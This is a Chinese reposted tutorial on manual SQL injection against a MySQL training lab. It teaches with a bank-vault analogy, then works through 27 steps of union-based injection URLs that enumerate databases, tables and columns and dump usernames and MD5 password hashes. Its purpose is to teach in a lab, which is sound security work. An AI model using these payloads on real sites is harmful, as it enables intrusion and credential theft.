【零基础学习】手工SQL注入——MySQL、Access、SqlServer......_356f589a7df439f6f744ff19bb8092c0-程序员宅基地

技术标签: SQL Injection  手工注入  SQL注入  

原文地址:https://mozhe.cn/news/detail/324

SQL注入介绍

SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:

 

某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规定:限制每人每次只能带一把开自己保险柜的钥匙,取自己的东西出入。在银行安检门口有个负责检查的安检员,安检员职责就是检查进入银行保险柜取物品的人每次是否只带了一把钥匙。

这个镇子上有多家银行,有个人名字叫“路人甲”,他去A银行取物品,A银行的安检员尽职尽责,对“路人甲”的全身上下、里里外外一丝不苟的检查N遍,确定他只带了一把自己的钥匙后,才放行让他进去取物品;后来“路人甲”去B银行去物品,他发现B银行的安检员是行长的小舅子,岗位就是个摆设,从未来上过班,进入保险柜也无人进行检查。所以“路人甲”带着他和他老婆的钥匙一起带来取,发现成功取到物品后,“路人甲”就多带把螺丝刀,通过安检门,利用螺丝刀打开行长小舅子的柜子,成功取走了他的物品,“路人甲”发现有行长的柜子是用钢板焊的,螺丝刀无法拆开,他就多带了把切割机,通过安检门,花了大功夫用切割机把柜子打开,把行长柜子里的东西全部取走了。

“路人甲”发现这样可以“致富”,他就整天从各个银行逛来逛去,去找安检不严的银行去取他人的东西。每个银行的安检门的摄像头都把他出入记录了下来,终于有一天,有家银行告诉了警察,警察调取了摄像头视频内容,把“路人甲”給逮捕了。根据相关法律法规,“路人甲”涉嫌未授权获取(入侵)他人物品,被判刑入狱。

 

我们把这个故事里面的每个内容分配个角色:

◆ 镇子==互联网

◆ 银行==业务系统(网站)

◆ 安检门==应用程序(代码)

◆ 安检员==过滤非安全代码(如SQL注入、XSS等危险代码)

◆ 保险柜的物品==存储在数据库中的数据,可能包含账户密码等敏感数据

◆ 小舅子保险柜的物品==业务系统(网站)的管理权限

◆ 行长保险柜的物品==服务器(主机)权限

◆ “路人甲”==操作浏览器的人

◆ “路人甲”的钥匙==提交的正常变量内容

◆ “路人甲”的老婆钥匙==提交的测试SQL注入的语句

◆ 螺丝刀==提交的SQL注入其他语句

◆ 切割机==WebShell或者提权的命令

◆ 摄像头==各种日志记录

◆ 警察==现实中的警察叔叔

◆ 法律法规==《刑法》、《网络安全法》

如果“路人甲”是一个安保公司的人,他来給银行做安全防护,他应该最清楚银行哪些地方是最薄弱的环节。可以給银行做个安全防护,镇上来取物品的人比较多,就多做几个大门(负载均衡),給银行的安检门外多加几层安检通道(防火墙、WAF、IPS、IDS等安全设备),把行长的小舅子换掉(修补漏洞),每天来检查安检人员是否在岗位上工作(定期检测),把保险柜和安检分别放在不同的房间(数据库与应用系统分离),全部摄像头开启(开启日志),除了这之外,还有多种安全防护方式。这里就不在讲故事了,真正到现实的业务系统的加固,是需要根据业务场景来决定的。

在线靶场地址

 

以下是一个Nginx+PHP+MySQL的业务场景靶场,其中php代码对参数内容未做任何过滤,导致SQL注入的产生,这个是最简单、基础的SQL注入练习环节,需要用户了解MySQL最基础的语法和数据库结构,如果基础较差,请自行补充MySQL基础知识。

MySQL手工注入靶场(本文所描述环境)https://www.mozhe.cn/bug/detail/82

手工SQL注入靶场专题https://www.mozhe.cn/Special/SQL_Injection

手工SQL注入详解

手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。

开启靶场环境:

第1步:

页面提交:http://mozhe.cn/new_list.php?id=1

数据库执行语句:select * from news where id=1

页面返回描述:返回内容正常

分析解说:正常浏览页面,找到有参数的地方,如id。

第2步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=1

数据库执行语句:select * from news where id=1 and 1=1

页面返回描述:返回内容正常

分析解说:测试SQL语句。

第3步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2

数据库执行语句:select * from news where id=1 and 1=2

页面返回描述:返回内容为空

分析解说:因为sql语句中,1=2不成立。

第4步:

页面提交:http://mozhe.cn/new_list.php?id=1 order by 1

数据库执行语句:select * from news where id=1 order by 1

页面返回描述:返回内容正常

分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。

 

第5步:

页面提交:http://mozhe.cn/new_list.php?id=1 order by 2

数据库执行语句:select * from news where id=1 order by 2

页面返回描述:返回内容正常

分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有2个字段。

 

第6步:

页面提交:http://mozhe.cn/new_list.php?id=1 order by 3

数据库执行语句:select * from news where id=1 order by 3

 

页面返回描述:返回内容正常

分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有3个字段。

第7步:

页面提交:http://mozhe.cn/new_list.php?id=1 order by 4

数据库执行语句:select * from news where id=1 order by 4

 

页面返回描述:返回内容正常

分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有4个字段。

第8步:

页面提交:http://mozhe.cn/new_list.php?id=1 order by 5

数据库执行语句:select * from news where id=1 order by 5

 

页面返回描述:返回内容为空

分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容不正常,说明字段数少于5个。

第9步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,2,3,4

数据库执行语句:select * from news where id=1 and 1=2 union select 1,2,3,4

 

页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3

分析解说:通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段,原本的查询应该是select id,title,contents,times from news where id=1,也就是说title标题是第2个位置显示,contents内容是在第三个位置显示。关于union的语法介绍,请自行补习功课。

第10步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,database(),version(),4

数据库执行语句:select * from news where id=1 and 1=2 union select 1,database(),version(),4

 

页面返回描述:在原来的标题上位置显示为mozhe_Discuz_StormGroup,内容的位置显示为5.7.22-0ubuntu0.16.04.1

分析解说:SQL语句中database()是查询当前数据库的名称(语法:select database();),一个服务器上可能有多个数据库,version()是查询当前数据的版本(语法:select version();),这里是这2个内容分别显示在第2、3的位置上,mozhe_Discuz_StormGroup为数据库,5.7.22-0ubuntu0.16.04.1为数据库版本和操作系统的版本。

第11步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

 

页面返回描述:在原来的标题上位置显示为information_schema,内容的位置显示为3

分析解说:这里涉及到数据库information_schema、表SCHEMATA、列SCHEMA_NAME三个内容,数据库information_schema是MySQL系统自带的数据库,其中记录了当前数据库系统中大部分我们需要了结的信息,比如字符集,权限相关,数据库实体对象信息,外检约束,分区,压缩表,表信息,索引信息,参数,优化,锁和事物等等。说白了,就是这个默认自带的数据中,存储了MySQL的数据库名字、表名字、列名字和其他信息,通过information_schema我们可以查看整个MySQL实例的情况。information_schema的详细介绍请自行补习(最好是自己安装一个mysql,连上去看看),limit 0,1意思是从第0行起,取1行数据,information_schema为获取的第1个数据库名称。

第12步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1

 

页面返回描述:在原来的标题上位置显示为mozhe_Discuz_StormGroup,内容的位置显示为3

分析解说:limit 1,1意思是从第1行起,取1行数据,mozhe_Discuz_StormGroup为获取的第2个数据库名称。

第13步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1

页面返回描述:在原来的标题上位置显示为mysql,内容的位置显示为3

 

分析解说:limit 2,1意思是从第2行起,取1行数据,mysql为获取的第3个数据库名称。

第14步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1

 

页面返回描述:在原来的标题上位置显示为performance_schema,内容的位置显示为3

分析解说:limit 3,1意思是从第3行起,取1行数据,performance_schema为获取的第4个数据库名称。

第15步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1

 

页面返回描述:在原来的标题上位置显示为sys,内容的位置显示为3

分析解说:limit 4,1意思是从第4行起,取1行数据,sys为获取的第5个数据库名称。

第16步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1

页面返回描述:返回内容为空

分析解说:limit 5,1意思是从第5行起,取1行数据,返回为空,说明只有5个数据库information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。

 

 

第17步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

页面返回描述:在原来的标题上位置显示为StormGroup_member,内容的位置显示为3

分析解说:查询对应数据库mozhe_Discuz_StormGroup的第1个数据表名称,limit 0,1,第1个表名为StormGroup_member。

第18步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

页面返回描述:在原来的标题上位置显示为notice,内容的位置显示为3

分析解说:查询对应数据库mozhe_Discuz_StormGroup的第2个数据表名称,limit 1,1,第2个表名为notice。

第19步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

页面返回描述:返回内容为空

分析解说:返回为空,说明数据库mozhe_Discuz_StormGroup只有2个数据表,StormGroup_member、notice。

第20步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

页面返回描述:在原来的标题上位置显示为id,内容的位置显示为int(11)

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第1个字段名称与类型,第1个名称为id,类型:整型int(11)。

第21步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

页面返回描述:在原来的标题上位置显示为name,内容的位置显示为varchar(20)

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第2个字段名称与类型,第2个名称为name,类型:字符型varchar(20)。

第22步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

页面返回描述:在原来的标题上位置显示为password,内容的位置显示为varchar(255)

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第3个字段名称与类型,第3个名称为passworde,类型:字符型varchar(255)。

第23步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

页面返回描述:在原来的标题上位置显示为status,内容的位置显示为int(11)

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第4个字段名称与类型,第4个名称为id,类型:整型int(11)。

第24步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

页面返回描述:返回内容为空

分析解说:返回为空,说明数据库mozhe_Discuz_StormGroup中的表StormGroup_member只有4个字段,名称为:id,name,password,status。

第25步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member

数据库执行语句:select * from news where id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member

页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中数据总数,共有2条数据。

第26步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

页面返回描述:在原来的标题上位置显示为mozhe-356f589a7df439f6f744ff19bb8092c0-0,内容的位置显示为3

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第1条数据的name、password、status的内容,三者之间用-连接起来,CONCAT的是把产生的字符串连接起来,这个地方拼接在一起时为了在一个地方全部显示出来。可以获得第一条数据的name账户为mozhe,密码password为356f589a7df439f6f744ff19bb8092c0(md5加密后的密码,可通过解密获到明文),status账户状态为0。

第27步:

页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

数据库执行语句:select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

页面返回描述:在原来的标题上位置显示为mozhe-6380305ffa6520047acfe95d29ae707b-1,内容的位置显示为3

分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第2条数据的name、password、status的内容,三者之间用-连接起来,CONCAT的是把产生的字符串连接起来,这个地方拼接在一起时为了在一个地方全部显示出来。可以获得第一条数据的name账户为mozhe,密码password为6380305ffa6520047acfe95d29ae707b(md5加密后的密码,可通过解密获到明文),status账户状态为1。

 

把最终MD5后的密码解密出来,就可以得到后台登录的明文密码了。

这个过程中,所有的SQL注入语句未做任何的转义和注释,在实际过程中,可能遇到对注入点进行处理,闭合的引号,括号等要先进行闭合,字符串的十六进制,注释掉多余的语句等等。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mozhe_/article/details/80607317

智能推荐

Spring Boot 获取 bean 的 3 种方式!还有谁不会?,Java面试官_springboot2.7获取bean-程序员宅基地

文章浏览阅读1.2k次,点赞35次,收藏18次。AutowiredPostConstruct 注释用于在依赖关系注入完成之后需要执行的方法上,以执行任何初始化。此方法必须在将类放入服务之前调用。支持依赖关系注入的所有类都必须支持此注释。即使类没有请求注入任何资源,用 PostConstruct 注释的方法也必须被调用。只有一个方法可以用此注释进行注释。_springboot2.7获取bean

Logistic Regression Java程序_logisticregression java-程序员宅基地

文章浏览阅读2.1k次。理论介绍 节点定义package logistic;public class Instance { public int label; public double[] x; public Instance(){} public Instance(int label,double[] x){ this.label = label; th_logisticregression java

linux文件误删除该如何恢复?,2024年最新Linux运维开发知识点-程序员宅基地

文章浏览阅读981次,点赞21次,收藏18次。本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。下面我们来进行文件的恢复,执行下文中的lsof命令,在其返回结果中我们可以看到test-recovery.txt (deleted)被删除了,但是其存在一个进程tail使用它,tail进程的进程编号是1535。我们看到文件名为3的文件,就是我们刚刚“误删除”的文件,所以我们使用下面的cp命令把它恢复回去。命令进入该进程的文件目录下,1535是tail进程的进程id,这个文件目录里包含了若干该进程正在打开使用的文件。

流媒体协议之RTMP详解-程序员宅基地

文章浏览阅读10w+次,点赞12次,收藏72次。RTMP(Real Time Messaging Protocol)实时消息传输协议是Adobe公司提出得一种媒体流传输协议,其提供了一个双向得通道消息服务,意图在通信端之间传递带有时间信息得视频、音频和数据消息流,其通过对不同类型得消息分配不同得优先级,进而在网传能力限制下确定各种消息得传输次序。_rtmp

微型计算机2017年12月下,2017年12月计算机一级MSOffice考试习题(二)-程序员宅基地

文章浏览阅读64次。2017年12月的计算机等级考试将要来临!出国留学网为考生们整理了2017年12月计算机一级MSOffice考试习题,希望能帮到大家,想了解更多计算机等级考试消息,请关注我们,我们会第一时间更新。2017年12月计算机一级MSOffice考试习题(二)一、单选题1). 计算机最主要的工作特点是( )。A.存储程序与自动控制B.高速度与高精度C.可靠性与可用性D.有记忆能力正确答案:A答案解析:计算...

20210415web渗透学习之Mysqludf提权(二)(胃肠炎住院期间转)_the provided input file '/usr/share/metasploit-fra-程序员宅基地

文章浏览阅读356次。在学MYSQL的时候刚刚好看到了这个提权,很久之前用过别人现成的,但是一直时间没去细想, 这次就自己复现学习下。 0x00 UDF 什么是UDF? UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,就像使..._the provided input file '/usr/share/metasploit-framework/data/exploits/mysql

随便推点

webService详细-程序员宅基地

文章浏览阅读3.1w次,点赞71次,收藏485次。webService一 WebService概述1.1 WebService是什么WebService是一种跨编程语言和跨操作系统平台的远程调用技术。Web service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准...

Retrofit(2.0)入门小错误 -- Could not locate ResponseBody xxx Tried: * retrofit.BuiltInConverters_已添加addconverterfactory 但是 could not locate respons-程序员宅基地

文章浏览阅读1w次。前言照例给出官网:Retrofit官网其实大家学习的时候,完全可以按照官网Introduction,自己写一个例子来运行。但是百密一疏,官网可能忘记添加了一句非常重要的话,导致你可能出现如下错误:Could not locate ResponseBody converter错误信息:Caused by: java.lang.IllegalArgumentException: Could not l_已添加addconverterfactory 但是 could not locate responsebody converter

一套键鼠控制Windows+Linux——Synergy在Windows10和Ubuntu18.04共控的实践_linux 18.04 synergy-程序员宅基地

文章浏览阅读1k次。一套键鼠控制Windows+Linux——Synergy在Windows10和Ubuntu18.04共控的实践Synergy简介准备工作(重要)Windows服务端配置Ubuntu客户端配置配置开机启动Synergy简介Synergy能够通过IP地址实现一套键鼠对多系统、多终端进行控制,免去了对不同终端操作时频繁切换键鼠的麻烦,可跨平台使用,拥有Linux、MacOS、Windows多个版本。Synergy应用分服务端和客户端,服务端即主控端,Synergy会共享连接服务端的键鼠给客户端终端使用。本文_linux 18.04 synergy

nacos集成seata1.4.0注意事项_seata1.4.0 +nacos 集成-程序员宅基地

文章浏览阅读374次。写demo的时候遇到了很多问题,记录一下。安装nacos1.4.0配置mysql数据库,新建nacos_config数据库,并根据初始化脚本新建表,使配置从数据库读取,可单机模式启动也可以集群模式启动,启动时 ./start.sh -m standaloneapplication.properties 主要是db部分配置## Copyright 1999-2018 Alibaba Group Holding Ltd.## Licensed under the Apache License,_seata1.4.0 +nacos 集成

iperf3常用_iperf客户端指定ip地址-程序员宅基地

文章浏览阅读833次。iperf使用方法详解 iperf3是一款带宽测试工具,它支持调节各种参数,比如通信协议,数据包个数,发送持续时间,测试完会报告网络带宽,丢包率和其他参数。 安装 sudo apt-get install iperf3 iPerf3常用的参数: -c :指定客户端模式。例如:iperf3 -c 192.168.1.100。这将使用客户端模式连接到IP地址为192.16..._iperf客户端指定ip地址

浮点性(float)转化为字符串类型 自定义实现和深入探讨C++内部实现方法_c++浮点数 转 字符串 精度损失最小-程序员宅基地

文章浏览阅读7.4k次。 写这个函数目的不是为了和C/C++库中的函数在性能和安全性上一比高低,只是为了给那些喜欢探讨函数内部实现的网友,提供一种从浮点性到字符串转换的一种途径。 浮点数是有精度限制的,所以即使我们在使用C/C++中的sprintf或者cout 限制,当然这个精度限制是可以修改的。比方在C++中,我们可以cout.precision(10),不过这样设置的整个输出字符长度为10,而不是特定的小数点后1_c++浮点数 转 字符串 精度损失最小

推荐文章

热门文章

相关标签